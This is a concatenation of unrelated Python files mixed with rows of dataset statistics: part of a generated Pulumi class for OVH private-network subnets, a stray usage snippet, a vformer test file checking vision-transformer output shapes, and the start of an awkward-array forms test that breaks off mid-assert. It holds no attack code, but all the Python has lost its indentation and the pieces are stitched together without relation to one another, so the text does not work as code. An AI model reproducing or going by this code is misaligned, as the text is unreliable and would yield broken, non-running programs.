pulumi.set(__self__, "gateway_ip", gateway_ip)
if ip_pools is not None:
pulumi.set(__self__, "ip_pools", ip_pools)
if network is not None:
pulumi.set(__self__, "network", network)
if network_id is not None:
pulumi.set(__self__, "network_id", network_id)
if no_gateway is not None:
pulumi.set(__self__, "no_gateway", no_gateway)
if project_id is not None:
pulumi.set(__self__, "project_id", project_id)
if region is not None:
pulumi.set(__self__, "region", region)
if start is not None:
pulumi.set(__self__, "start", start)
@property
@pulumi.getter
def cidr(self) -> Optional[pulumi.Input[str]]:
"""
Ip Block representing the subnet cidr.
"""
return pulumi.get(self, "cidr")
@cidr.setter
def cidr(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cidr", value)
@property
@pulumi.getter
def dhcp(self) -> Optional[pulumi.Input[bool]]:
"""
Enable DHCP.
Changing this forces a new resource to be created. Defaults to false.
"""
return pulumi.get(self, "dhcp")
@dhcp.setter
def dhcp(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "dhcp", value)
@property
@pulumi.getter
def end(self) -> Optional[pulumi.Input[str]]:
"""
Last ip for this region.
Changing this value recreates the subnet.
"""
return pulumi.get(self, "end")
@end.setter
def end(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "end", value)
@property
@pulumi.getter(name="gatewayIp")
def gateway_ip(self) -> Optional[pulumi.Input[str]]:
"""
The IP of the gateway
"""
return pulumi.get(self, "gateway_ip")
@gateway_ip.setter
def gateway_ip(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "gateway_ip", value)
@property
@pulumi.getter(name="ipPools")
def ip_pools(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PubicCloudPrivateNetworkSubnetIpPoolArgs']]]]:
"""
List of ip pools allocated in the subnet.
* `ip_pools/network` - Global network with cidr.
* `ip_pools/region` - Region where this subnet is created.
* `ip_pools/dhcp` - DHCP enabled.
* `ip_pools/end` - Last ip for this region.
* `ip_pools/start` - First ip for this region.
"""
return pulumi.get(self, "ip_pools")
@ip_pools.setter
def ip_pools(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PubicCloudPrivateNetworkSubnetIpPoolArgs']]]]):
pulumi.set(self, "ip_pools", value)
@property
@pulumi.getter
def network(self) -> Optional[pulumi.Input[str]]:
"""
Global network in CIDR format.
Changing this value recreates the subnet
"""
return pulumi.get(self, "network")
@network.setter
def network(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "network", value)
@property
@pulumi.getter(name="networkId")
def network_id(self) -> Optional[pulumi.Input[str]]:
"""
The id of the network.
Changing this forces a new resource to be created.
"""
return pulumi.get(self, "network_id")
@network_id.setter
def network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "network_id", value)
@property
@pulumi.getter(name="noGateway")
def no_gateway(self) -> Optional[pulumi.Input[bool]]:
"""
Set to true if you don't want to set a default gateway IP.
Changing this value recreates the resource. Defaults to false.
"""
return pulumi.get(self, "no_gateway")
@no_gateway.setter
def no_gateway(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "no_gateway", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> Optional[pulumi.Input[str]]:
"""
The id of the public cloud project. If omitted,
the `OVH_PROJECT_ID` environment variable is used.
Changing this forces a new resource to be created.
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The region in which the network subnet will be created.
Ex.: "GRA1". Changing this value recreates the resource.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter
def start(self) -> Optional[pulumi.Input[str]]:
"""
First ip for this region.
Changing this value recreates the subnet.
"""
return pulumi.get(self, "start")
@start.setter
def start(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "start", value)
class PubicCloudPrivateNetworkSubnet(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
dhcp: Optional[pulumi.Input[bool]] = None,
end: Optional[pulumi.Input[str]] = None,
network: Optional[pulumi.Input[str]] = None,
network_id: Optional[pulumi.Input[str]] = None,
no_gateway: Optional[pulumi.Input[bool]] = None,
project_id: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
start: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
> __DEPRECATED:__ Use `CloudNetworkPrivateSubnet` instead.
Creates a subnet in a private network of a public cloud project.
## Example Usage
```python
import pulumi
import pulumi_ovh as ovh
subnet = ovh.PubicCloudPrivateNetworkSubnet("subnet",
dhcp=True,
end="192.168.168.200",
network="192.168.168.0/24",
network_id="0234543",
no_gateway=False,
project_id="67890",
region="GRA1",
start="192.168.168.100")
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] dhcp: Enable DHCP.
Changing this forces a new resource to be created. Defaults to false.
:param pulumi.Input[str] end: Last ip for this region.
Changing this value recreates the subnet.
:param pulumi.Input[str] network: Global network in CIDR format.
Changing this value recreates the subnet
:param pulumi.Input[str] network_id: The id of the network.
Changing this forces a new resource to be created.
:param pulumi.Input[bool] no_gateway: Set to true if you don't want to set a default gateway IP.
Changing this value recreates the resource. Defaults to false.
:param pulumi.Input[str] project_id: The id of the public cloud project. If omitted,
the `OVH_PROJECT_ID` environment variable is used.
Changing this forces a new resource to be created.
:param pulumi.Input[str] region: The region in which the network subnet will be created.
Ex.: "GRA1". Changing this value recreates the resource.
:param pulumi.Input[str] start: First ip for this region.
Changing this value recreates the subnet.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: PubicCloudPrivateNetworkSubnetArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
> __DEPRECATED:__ Use `CloudNetworkPrivateSubnet` instead.
Creates a subnet in a private network of a public cloud project.
## Example Usage
```python
import pulumi
import pulumi_ovh as ovh
subnet = ovh.PubicCloudPrivateNetworkSubnet("subnet",
dhcp=True,
end="192.168.168.200",
network="192.168.168.0/24",
network_id="0234543",
no_gateway=False,
project_id="67890",
region="GRA1",
start="192.168.168.100")
```
:param str resource_name: The name of the resource.
:param PubicCloudPrivateNetworkSubnetArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(PubicCloudPrivateNetworkSubnetArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
dhcp: Optional[pulumi.Input[bool]] = None,
end: Optional[pulumi.Input[str]] = None,
network: Optional[pulumi.Input[str]] = None,
network_id: Optional[pulumi.Input[str]] = None,
no_gateway: Optional[pulumi.Input[bool]] = None,
project_id: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
start: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = PubicCloudPrivateNetworkSubnetArgs.__new__(PubicCloudPrivateNetworkSubnetArgs)
__props__.__dict__["dhcp"] = dhcp
if end is None and not opts.urn:
raise TypeError("Missing required property 'end'")
__props__.__dict__["end"] = end
if network is None and not opts.urn:
raise TypeError("Missing required property 'network'")
__props__.__dict__["network"] = network
if network_id is None and not opts.urn:
raise TypeError("Missing required property 'network_id'")
__props__.__dict__["network_id"] = network_id
__props__.__dict__["no_gateway"] = no_gateway
if project_id is None and not opts.urn:
raise TypeError("Missing required property 'project_id'")
__props__.__dict__["project_id"] = project_id
if region is None and not opts.urn:
raise TypeError("Missing required property 'region'")
__props__.__dict__["region"] = region
if start is None and not opts.urn:
raise TypeError("Missing required property 'start'")
__props__.__dict__["start"] = start
__props__.__dict__["cidr"] = None
__props__.__dict__["gateway_ip"] = None
__props__.__dict__["ip_pools"] = None
super(PubicCloudPrivateNetworkSubnet, __self__).__init__(
'ovh:index/pubicCloudPrivateNetworkSubnet:PubicCloudPrivateNetworkSubnet',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
cidr: Optional[pulumi.Input[str]] = None,
dhcp: Optional[pulumi.Input[bool]] = None,
end: Optional[pulumi.Input[str]] = None,
gateway_ip: Optional[pulumi.Input[str]] = None,
ip_pools: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PubicCloudPrivateNetworkSubnetIpPoolArgs']]]]] = None,
network: Optional[pulumi.Input[str]] = None,
network_id: Optional[pulumi.Input[str]] = None,
no_gateway: Optional[pulumi.Input[bool]] = None,
project_id: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
start: Optional[pulumi.Input[str]] = None) -> 'PubicCloudPrivateNetworkSubnet':
"""
Get an existing PubicCloudPrivateNetworkSubnet resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] cidr: Ip Block representing the subnet cidr.
:param pulumi.Input[bool] dhcp: Enable DHCP.
Changing this forces a new resource to be created. Defaults to false.
:param pulumi.Input[str] end: Last ip for this region.
Changing this value recreates the subnet.
:param pulumi.Input[str] gateway_ip: The IP of the gateway
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PubicCloudPrivateNetworkSubnetIpPoolArgs']]]] ip_pools: List of ip pools allocated in the subnet.
* `ip_pools/network` - Global network with cidr.
* `ip_pools/region` - Region where this subnet is created.
* `ip_pools/dhcp` - DHCP enabled.
* `ip_pools/end` - Last ip for this region.
* `ip_pools/start` - First ip for this region.
:param pulumi.Input[str] network: Global network in CIDR format.
Changing this value recreates the subnet
:param pulumi.Input[str] network_id: The id of the network.
Changing this forces a new resource to be created.
:param pulumi.Input[bool] no_gateway: Set to true if you don't want to set a default gateway IP.
Changing this value recreates the resource. Defaults to false.
:param pulumi.Input[str] project_id: The id of the public cloud project. If omitted,
the `OVH_PROJECT_ID` environment variable is used.
Changing this forces a new resource to be created.
:param pulumi.Input[str] region: The region in which the network subnet will be created.
Ex.: "GRA1". Changing this value recreates the resource.
:param pulumi.Input[str] start: First ip for this region.
Changing this value recreates the subnet.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _PubicCloudPrivateNetworkSubnetState.__new__(_PubicCloudPrivateNetworkSubnetState)
__props__.__dict__["cidr"] = cidr
__props__.__dict__["dhcp"] = dhcp
__props__.__dict__["end"] = end
__props__.__dict__["gateway_ip"] = gateway_ip
__props__.__dict__["ip_pools"] = ip_pools
__props__.__dict__["network"] = network
__props__.__dict__["network_id"] = network_id
__props__.__dict__["no_gateway"] = no_gateway
__props__.__dict__["project_id"] = project_id
__props__.__dict__["region"] = region
__props__.__dict__["start"] = start
return PubicCloudPrivateNetworkSubnet(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def cidr(self) -> pulumi.Output[str]:
"""
Ip Block representing the subnet cidr.
"""
return pulumi.get(self, "cidr")
@property
@pulumi.getter
def dhcp(self) -> pulumi.Output[Optional[bool]]:
"""
Enable DHCP.
Changing this forces a new resource to be created. Defaults to false.
"""
return pulumi.get(self, "dhcp")
@property
@pulumi.getter
def end(self) -> pulumi.Output[str]:
"""
Last ip for this region.
Changing this value recreates the subnet.
"""
return pulumi.get(self, "end")
@property
@pulumi.getter(name="gatewayIp")
def gateway_ip(self) -> pulumi.Output[str]:
"""
The IP of the gateway
"""
return pulumi.get(self, "gateway_ip")
@property
@pulumi.getter(name="ipPools")
def ip_pools(self) -> pulumi.Output[Sequence['outputs.PubicCloudPrivateNetworkSubnetIpPool']]:
"""
List of ip pools allocated in the subnet.
* `ip_pools/network` - Global network with cidr.
* `ip_pools/region` - Region where this subnet is created.
* `ip_pools/dhcp` - DHCP enabled.
* `ip_pools/end` - Last ip for this region.
* `ip_pools/start` - First ip for this region.
"""
return pulumi.get(self, "ip_pools")
@property
@pulumi.getter
def network(self) -> pulumi.Output[str]:
"""
Global network in CIDR format.
Changing this value recreates the subnet
"""
return pulumi.get(self, "network")
@property
@pulumi.getter(name="networkId")
def network_id(self) -> pulumi.Output[str]:
"""
The id of the network.
Changing this forces a new resource to be created.
"""
return pulumi.get(self, "network_id")
@property
@pulumi.getter(name="noGateway")
def no_gateway(self) -> pulumi.Output[Optional[bool]]:
"""
Set to true if you don't want to set a default gateway IP.
Changing this value recreates the resource. Defaults to false.
"""
return pulumi.get(self, "no_gateway")
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Output[str]:
"""
The id of the public cloud project. If omitted,
the `OVH_PROJECT_ID` environment variable is used.
Changing this forces a new resource to be created.
"""
return pulumi.get(self, "project_id")
@property
@pulumi.getter
def region(self) -> pulumi.Output[str]:
"""
The region in which the network subnet will be created.
Ex.: "GRA1". Changing this value recreates the resource.
"""
return pulumi.get(self, "region")
@property
@pulumi.getter
def start(self) -> pulumi.Output[str]:
"""
First ip for this region.
Changing this value recreates the subnet.
"""
return pulumi.get(self, "start")
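Besides creating a new subnet, an existing one can be adopted through the static get() defined above; a sketch that must run inside a Pulumi program, with "PROVIDER_ID" as a placeholder:

import pulumi
import pulumi_ovh as ovh

existing = ovh.PubicCloudPrivateNetworkSubnet.get("existing-subnet", id="PROVIDER_ID")
pulumi.export("cidr", existing.cidr)  # computed subnet CIDR, an Output[str]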
| 40.352941
| 165
| 0.615978
| 3,317
| 28,126
| 5.04703
| 0.058788
| 0.086733
| 0.076937
| 0.057822
| 0.847381
| 0.814587
| 0.790574
| 0.750075
| 0.739024
| 0.717042
| 0
| 0.00527
| 0.284897
| 28,126
| 696
| 166
| 40.41092
| 0.827077
| 0.367418
| 0
| 0.62931
| 1
| 0
| 0.094267
| 0.023583
| 0
| 0
| 0
| 0
| 0
| 1
| 0.16092
| false
| 0.002874
| 0.020115
| 0
| 0.278736
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5d0b2bd7ed4da81908d0eadab0142ce1d50cf9fd
| 11,722
|
py
|
Python
|
tests/test_models.py
|
aditya-agrawal-30502/vformer
|
e1f4950f980238442ff1dc39a8f0791e4fbc9dac
|
[
"MIT"
] | 90
|
2021-09-08T10:21:19.000Z
|
2022-03-26T18:11:47.000Z
|
tests/test_models.py
|
aditya-agrawal-30502/vformer
|
e1f4950f980238442ff1dc39a8f0791e4fbc9dac
|
[
"MIT"
] | 72
|
2021-09-09T06:54:50.000Z
|
2022-03-31T09:23:31.000Z
|
tests/test_models.py
|
aditya-agrawal-30502/vformer
|
e1f4950f980238442ff1dc39a8f0791e4fbc9dac
|
[
"MIT"
] | 21
|
2021-09-09T05:56:03.000Z
|
2022-03-20T08:22:09.000Z
|
import torch
import torch.nn as nn
from vformer.utils import MODEL_REGISTRY
models = MODEL_REGISTRY.get_list()
img_3channels_256 = torch.randn(2, 3, 256, 256)
img_3channels_224 = torch.randn(4, 3, 224, 224)
img_1channels_224 = torch.randn(2, 1, 224, 224)
def test_VanillaViT():
model = MODEL_REGISTRY.get("VanillaViT")(
img_size=256, patch_size=32, n_classes=10, in_channels=3
)
out = model(img_3channels_256)
assert out.shape == (2, 10)
del model
model = MODEL_REGISTRY.get("VanillaViT")(
img_size=256,
patch_size=32,
n_classes=10,
embedding_dim=1024,
decoder_config=(1024, 512),
)
out = model(img_3channels_256)
assert out.shape == (2, 10)
del model
def test_SwinTransformer():
model = MODEL_REGISTRY.get("SwinTransformer")(
img_size=224,
patch_size=4,
in_channels=3,
n_classes=1000,
embedding_dim=96,
depths=[2, 2, 6, 2],
num_heads=[3, 6, 12, 24],
window_size=7,
mlp_ratio=4.0,
qkv_bias=True,
qk_scale=None,
p_dropout=0.0,
attn_dropout=0.0,
drop_path_rate=0.1,
norm_layer=nn.LayerNorm,
ape=False,
patch_norm=True,
)
out = model(img_3channels_224)
assert out.shape == (4, 1000)
del model
# tiny_patch4_window7_224
model = MODEL_REGISTRY.get("SwinTransformer")(
img_size=224,
patch_size=4,
in_channels=3,
n_classes=10,
embedding_dim=96,
depths=[2, 2, 6, 2],
num_heads=[3, 6, 12, 24],
window_size=7,
p_dropout=0.2,
)
out = model(img_3channels_224)
assert out.shape == (4, 10)
del model
# tiny_c24_patch4_window8_256
model = MODEL_REGISTRY.get("SwinTransformer")(
img_size=256,
patch_size=4,
in_channels=3,
n_classes=10,
embedding_dim=96,
depths=[2, 2, 6, 2],
num_heads=[4, 8, 16, 32],
window_size=8,
p_dropout=0.2,
)
out = model(img_3channels_256)
assert out.shape == (2, 10)
del model
# for greyscale image
model = MODEL_REGISTRY.get("SwinTransformer")(
img_size=224,
patch_size=4,
in_channels=1,
n_classes=10,
embedding_dim=96,
depths=[2, 2, 6, 2],
num_heads=[3, 6, 12, 24],
window_size=7,
p_dropout=0.2,
)
out = model(img_1channels_224)
assert out.shape == (2, 10)
del model
# testing for decoder_config parameter
model = MODEL_REGISTRY.get("SwinTransformer")(
img_size=224,
patch_size=4,
in_channels=3,
n_classes=10,
embedding_dim=96,
depths=[2, 2, 6, 2],
num_heads=[3, 6, 12, 24],
window_size=7,
p_dropout=0.2,
decoder_config=(768, 256, 10, 2),
)
out = model(img_3channels_224)
del model
assert out.shape == (4, 10)
    # ape=False
model = MODEL_REGISTRY.get("SwinTransformer")(
img_size=224,
patch_size=4,
in_channels=3,
n_classes=10,
embedding_dim=96,
depths=[2, 2, 6, 2],
num_heads=[3, 6, 12, 24],
window_size=7,
p_dropout=0.2,
decoder_config=(768, 256, 10, 2),
ape=False,
)
out = model(img_3channels_224)
assert out.shape == (4, 10)
del model
def test_CrossVit():
model = MODEL_REGISTRY.get("CrossViT")(256, 16, 64, 10)
out = model(img_3channels_256)
assert out.shape == (2, 10)
del model
model = MODEL_REGISTRY.get("CrossViT")(
256,
16,
64,
10,
decoder_config_s=(1024, 256, 10),
decoder_config_l=(1024, 256, 10),
)
out = model(img_3channels_256)
assert out.shape == (2, 10)
del model
def test_pvt():
# classification
model = MODEL_REGISTRY.get("PVTClassification")(
patch_size=[7, 3, 3, 3],
embed_dims=[64, 128, 320, 512],
num_heads=[1, 2, 5, 8],
mlp_ratio=[8, 8, 4, 4],
qkv_bias=True,
norm_layer=nn.LayerNorm,
depths=[2, 2, 2, 2],
sr_ratios=[8, 4, 2, 1],
decoder_config=[512, 10],
num_classes=10,
)
out = model(img_3channels_224)
assert out.shape == (4, 10)
del model
model = MODEL_REGISTRY.get("PVTClassification")(
patch_size=[7, 3, 3, 3],
embed_dims=[64, 128, 320, 512],
num_heads=[1, 2, 5, 8],
mlp_ratio=[8, 8, 4, 4],
qkv_bias=True,
norm_layer=nn.LayerNorm,
depths=[2, 2, 2, 2],
sr_ratios=[8, 4, 2, 1],
decoder_config=512,
num_classes=10,
)
out = model(img_3channels_224)
assert out.shape == (4, 10)
del model
model = MODEL_REGISTRY.get("PVTClassificationV2")(linear=False)
out = model(img_3channels_224)
assert out.shape == (4, 1000)
del model
model = MODEL_REGISTRY.get("PVTClassificationV2")(num_classes=10)
out = model(img_3channels_224)
assert out.shape == (4, 10)
del model
model = MODEL_REGISTRY.get("PVTClassificationV2")(num_classes=10)
out = model(img_3channels_224)
assert out.shape == (4, 10)
del model
model = MODEL_REGISTRY.get("PVTClassification")(num_classes=12)
out = model(img_3channels_224)
assert out.shape == (4, 12)
del model
model = MODEL_REGISTRY.get("PVTClassificationV2")(
embedding_dims=[64, 128, 320, 512],
num_heads=[1, 2, 5, 8],
mlp_ratio=[8, 8, 4, 4],
qkv_bias=True,
norm_layer=nn.LayerNorm,
depths=[3, 4, 6, 3],
sr_ratios=[8, 4, 2, 1],
linear=True,
)
out = model(img_3channels_224)
assert out.shape == (4, 1000)
# segmentation
model = MODEL_REGISTRY.get("PVTSegmentation")()
outs = model(img_3channels_224)
assert outs.shape == (
4,
1,
224,
224,
    ), f"expected: {(4, 1, 224, 224)}, got: {outs.shape}"
del model
model = MODEL_REGISTRY.get("PVTSegmentation")()
outs = model(img_3channels_256)
assert outs.shape == (
2,
1,
256,
256,
    ), f"expected: {(2, 1, 256, 256)}, got: {outs.shape}"
del model
model = MODEL_REGISTRY.get("PVTSegmentation")()
outs = model(img_3channels_256)
assert outs.shape == (
2,
1,
256,
256,
    ), f"expected: {(2, 1, 256, 256)}, got: {outs.shape}"
del model
model = MODEL_REGISTRY.get("PVTSegmentationV2")(return_pyramid=False)
outs = model(img_3channels_224)
assert outs.shape == (
4,
1,
224,
224,
    ), f"expected: {(4, 1, 224, 224)}, got: {outs.shape}"
del model
model = MODEL_REGISTRY.get("PVTSegmentationV2")(return_pyramid=True)
out = model(img_3channels_224)
model = MODEL_REGISTRY.get("PVTSegmentationV2")(return_pyramid=False)
outs = model(img_3channels_256)
assert outs.shape == (
2,
1,
256,
256,
    ), f"expected: {(2, 1, 256, 256)}, got: {outs.shape}"
del model
# detection
model = MODEL_REGISTRY.get("PVTDetection")()
outs = model(img_3channels_224)
del model
model = MODEL_REGISTRY.get("PVTDetectionV2")()
outs = model(img_3channels_224)
del model
def test_cvt():
model = MODEL_REGISTRY.get("CVT")(img_size=256, patch_size=4, in_channels=3)
out = model(img_3channels_256)
assert out.shape == (2, 1000)
del model
model = MODEL_REGISTRY.get("CVT")(
img_size=224,
patch_size=4,
in_channels=3,
seq_pool=False,
embedding_dim=768,
num_heads=1,
mlp_ratio=4.0,
num_classes=10,
p_dropout=0.5,
attn_dropout=0.3,
drop_path=0.2,
positional_embedding="sine",
decoder_config=(768, 12024, 512, 256, 128, 64, 32),
)
out = model(img_3channels_224)
assert out.shape == (4, 10)
del model
model = MODEL_REGISTRY.get("CVT")(
img_size=224,
in_channels=3,
patch_size=4,
positional_embedding="none",
seq_pool=False,
decoder_config=None,
)
f = model(img_3channels_224)
assert f.shape == (4, 1000)
del model
model = MODEL_REGISTRY.get("CVT")(
img_size=224,
in_channels=3,
patch_size=4,
positional_embedding="none",
seq_pool=True,
decoder_config=768,
)
f = model(img_3channels_224)
assert f.shape == (4, 1000)
del model
def test_cct():
model = MODEL_REGISTRY.get("CCT")(img_size=256, patch_size=4, in_channels=3)
out = model(img_3channels_256)
assert out.shape == (2, 1000)
del model
model = MODEL_REGISTRY.get("CCT")(
img_size=224,
patch_size=4,
in_channels=3,
seq_pool=False,
embedding_dim=768,
num_heads=1,
mlp_ratio=4.0,
num_classes=10,
p_dropout=0.5,
attn_dropout=0.3,
drop_path=0.2,
positional_embedding="sine",
decoder_config=(768, 12024, 512, 256, 128, 64, 32),
)
out = model(img_3channels_224)
assert out.shape == (4, 10)
del model
model = MODEL_REGISTRY.get("CCT")(
img_size=224,
in_channels=3,
patch_size=4,
positional_embedding="none",
seq_pool=False,
decoder_config=None,
)
f = model(img_3channels_224)
assert f.shape == (4, 1000)
del model
model = MODEL_REGISTRY.get("CCT")(
img_size=224,
in_channels=3,
patch_size=4,
positional_embedding="none",
seq_pool=True,
decoder_config=768,
)
f = model(img_3channels_224)
assert f.shape == (4, 1000)
del model
def test_visformer():
model = MODEL_REGISTRY.get("Visformer_S")(224, 1000)
out = model(img_3channels_224)
assert out.shape == (4, 1000)
del model
model = MODEL_REGISTRY.get("Visformer_Ti")(224, 1000)
out = model(img_3channels_224)
assert out.shape == (4, 1000)
del model
model = MODEL_REGISTRY.get("VisformerV2_S")(224, 1000)
out = model(img_3channels_224)
assert out.shape == (4, 1000)
del model
model = MODEL_REGISTRY.get("VisformerV2_Ti")(224, 1000)
out = model(img_3channels_224)
assert out.shape == (4, 1000)
del model
def test_dpt():
img = torch.randn(4, 3, 384, 384)
model = MODEL_REGISTRY.get("DPTDepth")(
"vitb16",
enable_attention_hooks=True,
)
del model
model = MODEL_REGISTRY.get("DPTDepth")("vitl16")
del model
model = MODEL_REGISTRY.get("DPTDepth")("vitl16", invert=True, readout="ignore")
del model
model = MODEL_REGISTRY.get("DPTDepth")("vitb16", invert=True, readout="add")
    del model
    # Only initialise the large models here; no forward pass, because they are
    # too large for the GitHub CI pipeline to handle. The forward pass is
    # exercised on the ViT-tiny model below.
model = MODEL_REGISTRY.get("DPTDepth")(
"vit_tiny", enable_attention_hooks=True, channels_last=True
)
out = model(img)
assert out.shape == (4, 384, 384)
del model
model = MODEL_REGISTRY.get("DPTDepth")("vit_tiny", invert=True, readout="ignore")
out = model(img)
assert out.shape == (4, 384, 384)
del model
model = MODEL_REGISTRY.get("DPTDepth")("vit_tiny", readout="add", use_bn=True)
out = model(img)
assert out.shape == (4, 384, 384)
del model
model = MODEL_REGISTRY.get("DPTDepth")(
"vit_tiny",
readout="add",
use_bn=True,
)
out = model(img)
assert out.shape == (4, 384, 384)
del model
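The registry pattern these tests lean on, in isolation: list what is registered, then build a model by name (constructor arguments mirror the calls above):

from vformer.utils import MODEL_REGISTRY
import torch

print(MODEL_REGISTRY.get_list())  # names usable with MODEL_REGISTRY.get()
model = MODEL_REGISTRY.get("VanillaViT")(
    img_size=256, patch_size=32, n_classes=10, in_channels=3)
logits = model(torch.randn(2, 3, 256, 256))
assert logits.shape == (2, 10)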
| 25.262931
| 86
| 0.587186
| 1,577
| 11,722
| 4.164236
| 0.105263
| 0.112685
| 0.112076
| 0.143901
| 0.849094
| 0.837216
| 0.817116
| 0.776763
| 0.755901
| 0.735039
| 0
| 0.109121
| 0.285446
| 11,722
| 463
| 87
| 25.317495
| 0.674904
| 0.013308
| 0
| 0.776923
| 0
| 0
| 0.073966
| 0
| 0
| 0
| 0
| 0
| 0.097436
| 1
| 0.020513
| false
| 0
| 0.007692
| 0
| 0.028205
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 5d6d66b694c95f4ae35277457b87db6a0c795a2f
| 31,658
| py
| Python
| tests/test_0057-virtual-array.py
| colesbury/awkward-1.0
| d036ab18eb54de8a2571d9f179d315ac8ee22119
| ["BSD-3-Clause"] | null | null | null
| tests/test_0057-virtual-array.py
| colesbury/awkward-1.0
| d036ab18eb54de8a2571d9f179d315ac8ee22119
| ["BSD-3-Clause"] | null | null | null
| tests/test_0057-virtual-array.py
| colesbury/awkward-1.0
| d036ab18eb54de8a2571d9f179d315ac8ee22119
| ["BSD-3-Clause"] | null | null | null |
# BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/main/LICENSE
import json
import pickle
import pytest # noqa: F401
import numpy as np # noqa: F401
import awkward as ak # noqa: F401
def test_forms():
form = ak.forms.NumpyForm([], 8, "d")
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert form.inner_shape == []
assert form.itemsize == 8
assert form.primitive == "float64"
assert form.has_identities is False
assert form.parameters == {}
assert form.form_key is None
assert json.loads(form.tojson(False, True)) == {
"class": "NumpyArray",
"inner_shape": [],
"itemsize": 8,
"format": "d",
"primitive": "float64",
"has_identities": False,
"parameters": {},
"form_key": None,
}
assert json.loads(str(form)) == {
"class": "NumpyArray",
"itemsize": 8,
"format": "d",
"primitive": "float64",
}
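    # Note (added comment): tojson(False, True) spells out every field
    # explicitly, while str(form) is the compact rendering that drops fields
    # still holding their default values, as the two asserts above show.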
form = ak.forms.NumpyForm(
[1, 2, 3],
8,
"d",
has_identities=True,
parameters={"hey": ["you", {"there": 3}]},
form_key="yowzers",
)
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert form.inner_shape == [1, 2, 3]
assert form.itemsize == 8
assert form.primitive == "float64"
assert form.has_identities is True
assert form.parameters == {"hey": ["you", {"there": 3}]}
assert form.parameter("hey") == ["you", {"there": 3}]
assert form.form_key == "yowzers"
assert json.loads(form.tojson(False, True)) == {
"class": "NumpyArray",
"inner_shape": [1, 2, 3],
"itemsize": 8,
"format": "d",
"primitive": "float64",
"has_identities": True,
"parameters": {"hey": ["you", {"there": 3}]},
"form_key": "yowzers",
}
assert json.loads(str(form)) == {
"class": "NumpyArray",
"inner_shape": [1, 2, 3],
"itemsize": 8,
"format": "d",
"primitive": "float64",
"has_identities": True,
"parameters": {"hey": ["you", {"there": 3}]},
"form_key": "yowzers",
}
form = ak.forms.BitMaskedForm(
"i8",
ak.forms.NumpyForm([], 8, "d"),
True,
False,
parameters={"hey": ["you"]},
form_key="yowzers",
)
assert form == form
assert pickle.loads(pickle.dumps(form, -1)) == form
assert ak.forms.Form.fromjson(form.tojson(False, False)) == form
assert ak.forms.Form.fromjson(form.tojson(False, True)) == form
assert json.loads(form.tojson(False, True)) == {
